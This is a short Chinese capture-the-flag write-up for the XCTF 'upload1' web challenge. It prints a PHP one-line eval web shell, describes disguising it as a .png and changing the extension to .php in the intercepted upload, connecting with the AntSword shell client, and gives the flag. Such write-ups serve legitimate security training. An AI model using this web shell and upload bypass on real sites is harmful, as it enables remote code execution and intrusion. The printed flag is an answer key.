攻防世界we进阶区之upload1
题目:打开链接,先上传一个php文件试试
所以,我们新建一个1.txt,写入php一句话: <?php @eval($_REQUEST[‘c’]);?>然后修改文件后缀为.png
上传该文件并抓包,修改filename后缀为.php得到upload:upload/1596870603.1.php,打开成功
利用中国蚁剑链接,密码即为刚刚所创的png格式的php文件里的c
连接成功,打开html文件下的flag.php即可得到flag
$flag=“cyberpeace{e54061244aa29c17a76089dfe7ab9bc4}”